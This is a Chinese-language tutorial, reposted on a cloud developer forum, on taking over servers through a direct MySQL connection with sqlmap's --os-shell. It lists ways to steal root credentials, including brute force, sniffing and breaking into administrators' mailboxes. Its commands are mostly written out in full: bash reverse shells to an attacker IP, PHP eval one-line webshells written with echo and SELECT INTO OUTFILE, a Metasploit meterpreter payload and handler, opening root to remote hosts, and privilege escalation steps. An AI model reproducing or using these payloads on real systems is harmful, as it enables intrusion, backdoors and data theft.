AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

4.3 使用sqlmap直连MySQL获取webshell

2023-08-22 1001
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
RDS AI 助手,专业版
RDS MySQL DuckDB 分析主实例,集群系列 4核8GB
简介: 4.3 使用sqlmap直连MySQL获取webshell

4.3 使用sqlmap直连MySQL获取webshell

在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了

4.3.1 使用场景

(1) 获取了MySQL数据库账户和密码

(2) 可以访问3306端口及数据库

4.3.2 扫描获取root账户的密码

通常有下面一些方法来获取root账户的密码

(1) phpMyAdmin 多线程批量破解工具,可以通过收集phpMyAdmin地址进行暴力破解

(2) 代码泄露获取数据库账户和密码

(3) 文件包含读取配置文件中的数据库账户和密码

(4) 通过网络嗅探获取

(5) 渗透运维人员的邮箱及个人主机获取

4.3.3 获取shell

  1. 通过sqlmap连接MySQL获取shell

(1) 直接连接数据库

sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

(2) 通过选择32位或者64位操作系统webshell,执行

bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

(4) 通过echo命令生成shell

echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

如果可以通过phpmyadmin管理数据库,就可以修改host为"%" 并执行权限更新操作,具体如下:

use mysql;

update user set host = '%' where user = 'root';

flush privileges;

注意:如果数据库中有都个host连接,修改时可能会导致数据库连接出问题

  1. 通过MSF反弹获取shell

(1) 使用msfvenom生成MSF反弹的PHP脚本木马,默认端口4444

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 10.12.22.33 //这个IP地址就是自己的独立服务器IP地址,

show options

run 0 或者 exploit

(3) 上传并执行PHP文件

将上面生成的bmfx.php文件上传至目标站点,然后访问,如果没有问题的话,那么MSF会显示成功反弹shell

  1. 通过PHPMyAdmin管理解码查询生成webshell

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

4.3.4 实例演示

  1. 直接连接MySQL数据库

sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

如果上述成功了, 会让你选中服务器架构是32位还是64位

  1. 上传UDF文件

在上述操作选择系统架构之后,sqlmap会自动上传UDF文件到服务器提权位置,记住,不管获取的shell是否成功都会显示os-shell提示符

  1. 执行命令

cat /etc/passwd

如果是真的成功获取了shell,那么执行的结果就是我们想要的信息

  1. 获取反弹shell

虽然通过sqlmap获取了shell,但实际操作的话着实不方便,需要使用独立的服务器进行反弹shell

nc -lvnp 9988

在sqlmap的shell执行

bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

  1. 在服务器上生成webshell

上述操作如果没有任何问题,那么就可以找到真实路径直接生成webshell,可以在获取的反弹shell中执行locate *.php找到网站的真实路径,然后在该路径下通过echo命令生成webshell,具体如下:

echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

  1. 获取webshell

上面在服务器上生成的webshell是一句话,可以通过中国菜刀连接此一句话,进行获取webshell

  1. 通过phpMyAdmin生成一句话后门

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

  1. 通过MSF反弹获取shell
  1. MSF提权参考

通过MSF反弹shell,执行background将Session放在后台运行,然后搜索可以利用的exploit来进行测试,具体命令如下:

background

search "关键字" //这里是跟漏洞相关的关键字,比如search tomcat 等等

use exploit/linux

show options

set session 1

exploit

sessions -i 1

getuid

文章标签:
云数据库 RDS MySQL 版
Shell
关系型数据库
MySQL
PHP
数据库
关键词:
sqlmap云数据库 RDS MySQL 版
相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。 &nbsp; 相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情:&nbsp;https://www.aliyun.com/product/rds/mysql&nbsp;
五行缺你994
目录
相关文章
余二五
|
Web App开发 关系型数据库 PHP
DVWA+SQLmap+Mysql注入实战
余二五
2393 0
顾翔
|
5月前
|
缓存 关系型数据库 BI
使用MYSQL Report分析数据库性能(下)
使用MYSQL Report分析数据库性能
顾翔
430 158
翼龙云TG_yilongcloud
|
5月前
|
关系型数据库 MySQL 数据库
自建数据库如何迁移至RDS MySQL实例
数据库迁移是一项复杂且耗时的工程,需考虑数据安全、完整性及业务中断影响。使用阿里云数据传输服务DTS,可快速、平滑完成迁移任务,将应用停机时间降至分钟级。您还可通过全量备份自建数据库并恢复至RDS MySQL实例,实现间接迁移上云。
翼龙云TG_yilongcloud
172 1
游客vphb4ae2je2zi
|
5月前
|
关系型数据库 MySQL 数据库
阿里云数据库RDS费用价格:MySQL、SQL Server、PostgreSQL和MariaDB引擎收费标准
阿里云RDS数据库支持MySQL、SQL Server、PostgreSQL、MariaDB,多种引擎优惠上线!MySQL倚天版88元/年,SQL Server 2核4G仅299元/年,PostgreSQL 227元/年起。高可用、可弹性伸缩,安全稳定。详情见官网活动页。
游客vphb4ae2je2zi
981 152
上云就上阿狸云
|
5月前
|
关系型数据库 MySQL 数据库
阿里云数据库RDS支持MySQL、SQL Server、PostgreSQL和MariaDB引擎
阿里云数据库RDS支持MySQL、SQL Server、PostgreSQL和MariaDB引擎,提供高性价比、稳定安全的云数据库服务,适用于多种行业与业务场景。
上云就上阿狸云
802 156
顾翔
|
5月前
|
缓存 监控 关系型数据库
使用MYSQL Report分析数据库性能(中)
使用MYSQL Report分析数据库性能
顾翔
400 156
顾翔
|
5月前
|
缓存 监控 关系型数据库
使用MYSQL Report分析数据库性能(上)
最终建议:当前系统是完美的读密集型负载模型,优化重点应放在减少行读取量和提高数据定位效率。通过索引优化、分区策略和内存缓存,预期可降低30%的CPU负载,同时保持100%的缓冲池命中率。建议每百万次查询后刷新统计信息以持续优化
顾翔
510 161
游客7wkr3y7oxyt7a
|
6月前
|
存储 运维 关系型数据库
从MySQL到云数据库,数据库迁移真的有必要吗?
本文探讨了企业在业务增长背景下,是否应从 MySQL 迁移至云数据库的决策问题。分析了 MySQL 的优势与瓶颈,对比了云数据库在存储计算分离、自动化运维、多负载支持等方面的优势,并提出判断迁移必要性的五个关键问题及实施路径,帮助企业理性决策并落地迁移方案。
游客7wkr3y7oxyt7a
200 0
游客vphb4ae2je2zi
|
5月前
|
关系型数据库 MySQL 分布式数据库
阿里云PolarDB云原生数据库收费价格:MySQL和PostgreSQL详细介绍
阿里云PolarDB兼容MySQL、PostgreSQL及Oracle语法,支持集中式与分布式架构。标准版2核4G年费1116元起,企业版最高性能达4核16G,支持HTAP与多级高可用,广泛应用于金融、政务、互联网等领域,TCO成本降低50%。
游客vphb4ae2je2zi
1432 6
上云就上阿狸云
|
5月前
|
关系型数据库 分布式数据库 数据库
阿里云数据库收费价格:MySQL、PostgreSQL、SQL Server和MariaDB引擎费用整理
阿里云数据库提供多种类型,包括关系型与NoSQL,主流如PolarDB、RDS MySQL/PostgreSQL、Redis等。价格低至21元/月起,支持按需付费与优惠套餐,适用于各类应用场景。
上云就上阿狸云
1121 4

热门文章

最新文章

  • 1
    阿里云DTS踩坑经验分享系列|如何使用DTS进行MySQL->ClickHouse同步
  • 2
    MySQL · 引擎特性 · InnoDB 大字段压缩
  • 3
    MySQL 小心使用 replace into
  • 4
    mysql远程连接数据库很慢
  • 5
    MySQL查询优化之order by 、 group by与分页查询优化
  • 6
    【阿里云镜像】切换阿里镜像,加速MySQL下载
  • 7
    面试官问:MySQL 删除表数据,磁盘空间还一直被占用,为什么?
  • 8
    解析 MySQL 锁机制:共享锁、排它锁、间隙锁、意向锁等,保障数据安全与高并发的秘密武器
  • 9
    MySQL - key、primary key、unique key、index 区别(一)
  • 10
    MySQL的死锁系列- 锁的类型以及加锁原理
  • 1
    Java语言与MySQL数据库连接的技术性探讨
    229
  • 2
    mysql 故障排除与优化
    211
  • 3
    mysql 高阶语句 与视图
    234
  • 4
    mysql日志管理 、备份与恢复
    277
  • 5
    mysql 存储引擎 基本介绍
    172
  • 6
    mysql 事务基本介绍
    167
  • 7
    mysql 索引基本介绍
    125
  • 8
    mysql 数据库 增删改查 基本操作
    280
  • 9
    mysql 数据库 基本介绍
    144
  • 10
    在MySQL中, 自增主键和UUID作为主键有什么区别?
    332

    • 相关课程

    更多
  • MySQL企业常见架构与调优经验分享
  • 阿里云云原生数据仓库AnalyticDB MySQL版 使用教程
  • MySQL实战进阶
  • 阿里云数据库产品家族及特性
  • 数据库及SQL/MySQL基础
  • 云数据库MySQL快速入门

    • 相关电子书

    更多
  • PolarDB MySQL引擎重磅功能及产品能力盛大发布
  • 阿里云MySQL云数据库产品体系介绍
  • One Box: 解读事务与分析一体化数据库 HybridDB for MySQL

    • 相关实验场景

    更多
  • 如何快速连接云数据库RDS MySQL
  • MySQL数据库快速部署实践

    • 推荐镜像

    更多
  • mysql
    • 下一篇
    第五届伏魔挑战赛如约来袭,诚邀各路高手来战!